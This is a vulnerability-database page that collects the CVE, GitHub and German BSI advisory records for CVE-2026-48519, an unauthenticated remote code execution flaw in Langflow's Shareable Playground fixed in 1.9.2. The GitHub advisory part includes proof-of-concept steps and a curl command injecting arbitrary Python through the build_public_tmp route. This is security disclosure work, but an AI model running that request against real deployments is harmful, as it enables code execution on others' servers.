Vulnerability-Lookup

CVE-2026-48519 (GCVE-0-2026-48519)

Vulnerability from cvelistv5 – Published: 2026-06-23 16:25 – Updated: 2026-06-23 17:02

Title

Langflow: Unauthenticated RCE in Shareable Playgrounds

Summary

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.2, the "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload. The vulnerable field is data.nodes[X].data.node.template.code.value. This vulnerability is fixed in 1.9.2.

Severity

9.6 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/langflow-ai/langflow/security/…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
langflow-ai	langflow	Affected: < 1.9.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-48519",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-23T17:02:06.128322Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-23T17:02:49.695Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "langflow",
          "vendor": "langflow-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.9.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.2, the \"Shareable Playground\" (or \"Public Flows\" in code) contains a critical RCE vulnerability. Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload. The vulnerable field is data.nodes[X].data.node.template.code.value. This vulnerability is fixed in 1.9.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-23T16:25:09.927Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
        }
      ],
      "source": {
        "advisory": "GHSA-v5ff-9q35-q26f",
        "discovery": "UNKNOWN"
      },
      "title": "Langflow: Unauthenticated RCE in Shareable Playgrounds"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-48519",
    "datePublished": "2026-06-23T16:25:09.927Z",
    "dateReserved": "2026-05-21T16:18:10.619Z",
    "dateUpdated": "2026-06-23T17:02:49.695Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-48519",
      "date": "2026-06-14",
      "epss": "0.00092",
      "percentile": "0.26076"
    },
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48519\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-23T17:02:06.128322Z\"}}}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-23T17:02:15.648Z\"}}], \"cna\": {\"title\": \"Langflow: Unauthenticated RCE in Shareable Playgrounds\", \"source\": {\"advisory\": \"GHSA-v5ff-9q35-q26f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"langflow-ai\", \"product\": \"langflow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.9.2\"}]}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f\", \"name\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.2, the \\\"Shareable Playground\\\" (or \\\"Public Flows\\\" in code) contains a critical RCE vulnerability. Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload. The vulnerable field is data.nodes[X].data.node.template.code.value. This vulnerability is fixed in 1.9.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-23T16:25:09.927Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-48519\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-23T17:02:49.695Z\", \"dateReserved\": \"2026-05-21T16:18:10.619Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-23T16:25:09.927Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-V5FF-9Q35-Q26F

Vulnerability from github – Published: 2026-06-16 17:35 – Updated: 2026-06-16 17:35

Summary

Langflow: Unauthenticated RCE in Shareable Playgrounds

Details

Summary

The "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Simply sharing a flow exposes the deployment to RCE risk by authenticated users.

Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe

Details

Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!

The vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.

PoC

Reproduction: 1. Create a new flow and add a Chat Input node to it 2. Share the flow ("Shareable Playground") 3. Access the public link with the browser developers tools open and execute the flow. 4. Find the /api/v1/build_public_tmp route and copy as cURL 5. Edit the data.nodes[X].data.node.template.code.value JSON field with any python code and run the cURL command.

Example PoC (replace flow ID with the correct one), and download test_with_python.json:

curl 'http://localhost:7860/api/v1/build_public_tmp/<flow-id>/flow?start_component_id=ChatInput-syEJp&log_builds=false&event_delivery=streaming' \
  -H 'Content-Type: application/json' \
  -b 'client_id=anything' \
  --data-raw "$(cat test_with_python.json)"

Search for touch /tmp/pwned in the test_with_python.json and edit for any other code.

The stacktrace for the code executed is:

...
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 495, in generate_flow_events
    ids, vertices_to_run, graph = await build_graph_and_get_order()
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 234, in build_graph_and_get_order
    graph = await create_graph(fresh_session, flow_id_str, flow_name)
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 298, in create_graph
    return await build_graph_from_data(
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py", line 192, in build_graph_from_data
    graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get("user_id"))
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1153, in from_payload
    graph.add_nodes_and_edges(vertices, edges)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 270, in add_nodes_and_edges
    self.initialize()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 512, in initialize
    self._build_graph()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1305, in _build_graph
    self._instantiate_components_in_vertices()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1347, in _instantiate_components_in_vertices
    vertex.instantiate_component(self.user_id)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py", line 382, in instantiate_component
    self.custom_component, _ = initialize.loading.instantiate_class(
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py", line 45, in instantiate_class
    custom_component: CustomComponent | Component = class_object(
  File "<string>", line 59, in __init__

Impact

Unauthenticated RCE on any deployment with a shareable playground.

Ori Lahav Security Researcher @ Rubrik Inc.

Severity

9.6 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.9.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T17:35:32Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThe \"Shareable Playground\" (or \"Public Flows\" in code) contains a critical RCE vulnerability.\nSimply sharing a flow exposes the deployment to RCE risk by authenticated users.\n\nTested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe\n\n### Details\nShareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link.\nSpecifically, it enables the route `/api/v1/build_public_tmp` to execute any public flow, given a public flow ID.\nWhen the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!\n\nThe vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.\n\n### PoC\nReproduction:\n1. Create a new flow and add a Chat Input node to it\n2. Share the flow (\"Shareable Playground\")\n3. Access the public link with the browser developers tools open and execute the flow.\n4. Find the `/api/v1/build_public_tmp` route and copy as cURL\n5. Edit the `data.nodes[X].data.node.template.code.value` JSON field with any python code and run the cURL command.\n\nExample PoC (replace flow ID with the correct one), and download [test_with_python.json](https://github.com/user-attachments/files/25159927/test_with_python.json):\n```bash\ncurl \u0027http://localhost:7860/api/v1/build_public_tmp/\u003cflow-id\u003e/flow?start_component_id=ChatInput-syEJp\u0026log_builds=false\u0026event_delivery=streaming\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b \u0027client_id=anything\u0027 \\\n  --data-raw \"$(cat test_with_python.json)\"\n```\nSearch for `touch /tmp/pwned` in the `test_with_python.json` and edit for any other code.\n\n\n\nThe stacktrace for the code executed is:\n```\n...\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 495, in generate_flow_events\n    ids, vertices_to_run, graph = await build_graph_and_get_order()\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 234, in build_graph_and_get_order\n    graph = await create_graph(fresh_session, flow_id_str, flow_name)\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 298, in create_graph\n    return await build_graph_from_data(\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py\", line 192, in build_graph_from_data\n    graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get(\"user_id\"))\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1153, in from_payload\n    graph.add_nodes_and_edges(vertices, edges)\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 270, in add_nodes_and_edges\n    self.initialize()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 512, in initialize\n    self._build_graph()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1305, in _build_graph\n    self._instantiate_components_in_vertices()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1347, in _instantiate_components_in_vertices\n    vertex.instantiate_component(self.user_id)\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py\", line 382, in instantiate_component\n    self.custom_component, _ = initialize.loading.instantiate_class(\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py\", line 45, in instantiate_class\n    custom_component: CustomComponent | Component = class_object(\n  File \"\u003cstring\u003e\", line 59, in __init__\n```\n\n### Impact\nUnauthenticated RCE on any deployment with a shareable playground.\n\n\n\nOri Lahav\nSecurity Researcher @ Rubrik Inc.",
  "id": "GHSA-v5ff-9q35-q26f",
  "modified": "2026-06-16T17:35:32Z",
  "published": "2026-06-16T17:35:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow: Unauthenticated RCE in Shareable Playgrounds"
}

WID-SEC-W-2026-1713

Vulnerability from csaf_certbund - Published: 2026-05-27 22:00 - Updated: 2026-05-27 22:00

Summary

Langflow: Mehrere Schwachstellen

Severity

Hoch

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung: Langflow bietet eine visuelle Schnittstelle zum Erstellen von LLM-basierten Anwendungen.

Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Langflow ausnutzen, um beliebigen Programmcode auszuführen oder einen Denial of Service Zustand herbeizuführen.

Betroffene Betriebssysteme: - Linux - Sonstiges - UNIX - Windows

CVE-2026-48519

Affected products

Known affected 1 product

Product	Identifier	Version	Remediation
Open Source Langflow <1.9.2 Open Source / Langflow		<1.9.2

CVE-2026-7524

Affected products

Known affected 1 product

Product	Identifier	Version	Remediation
Open Source Langflow <1.9.2 Open Source / Langflow		<1.9.2

CVE-2026-7528

Affected products

Known affected 1 product

Product	Identifier	Version	Remediation
Open Source Langflow <1.9.2 Open Source / Langflow		<1.9.2

References

8 references

URL	Category
https://wid.cert-bund.de/.well-known/csaf/white/2…	self
https://wid.cert-bund.de/portal/wid/securityadvis…	self
https://github.com/langflow-ai/langflow/releases	external
https://www.ibm.com/support/pages/node/7273426	external
https://euvd.enisa.europa.eu/enisa/EUVD-2026-32494	external
https://www.ibm.com/support/pages/node/7273427	external
https://euvd.enisa.europa.eu/enisa/EUVD-2026-32495	external
https://github.com/langflow-ai/langflow/security/…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Langflow bietet eine visuelle Schnittstelle zum Erstellen von LLM-basierten Anwendungen.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Langflow ausnutzen, um beliebigen Programmcode auszuf\u00fchren oder einen Denial of Service Zustand herbeizuf\u00fchren.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2026-1713 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1713.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2026-1713 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1713"
      },
      {
        "category": "external",
        "summary": "Langflow Releases vom 2026-05-27",
        "url": "https://github.com/langflow-ai/langflow/releases"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin 7273426 vom 2026-05-27",
        "url": "https://www.ibm.com/support/pages/node/7273426"
      },
      {
        "category": "external",
        "summary": "EUVD-2026-32494 vom 2026-05-27",
        "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-32494"
      },
      {
        "category": "external",
        "summary": "IBM Security Bulletin 7273427 vom 2026-05-27",
        "url": "https://www.ibm.com/support/pages/node/7273427"
      },
      {
        "category": "external",
        "summary": "EUVD-2026-32495 vom 2026-05-27",
        "url": "https://euvd.enisa.europa.eu/enisa/EUVD-2026-32495"
      },
      {
        "category": "external",
        "summary": "GitHub Security Advisory GHSA-v5ff-9q35-q26f vom 2026-05-27",
        "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
      }
    ],
    "source_lang": "en-US",
    "title": "Langflow: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2026-05-27T22:00:00.000+00:00",
      "generator": {
        "date": "2026-05-28T11:20:33.736+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.6.0"
        }
      },
      "id": "WID-SEC-W-2026-1713",
      "initial_release_date": "2026-05-27T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2026-05-27T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c1.9.2",
                "product": {
                  "name": "Open Source Langflow \u003c1.9.2",
                  "product_id": "T054822"
                }
              },
              {
                "category": "product_version",
                "name": "1.9.2",
                "product": {
                  "name": "Open Source Langflow 1.9.2",
                  "product_id": "T054822-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:langflow:langflow:1.9.2"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Langflow"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-48519",
      "product_status": {
        "known_affected": [
          "T054822"
        ]
      },
      "release_date": "2026-05-27T22:00:00.000+00:00",
      "title": "CVE-2026-48519"
    },
    {
      "cve": "CVE-2026-7524",
      "product_status": {
        "known_affected": [
          "T054822"
        ]
      },
      "release_date": "2026-05-27T22:00:00.000+00:00",
      "title": "CVE-2026-7524"
    },
    {
      "cve": "CVE-2026-7528",
      "product_status": {
        "known_affected": [
          "T054822"
        ]
      },
      "release_date": "2026-05-27T22:00:00.000+00:00",
      "title": "CVE-2026-7528"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-48519 (GCVE-0-2026-48519)

GHSA-V5FF-9Q35-Q26F

Summary

Details

PoC

Impact

WID-SEC-W-2026-1713

Tags

Sightings

Nomenclature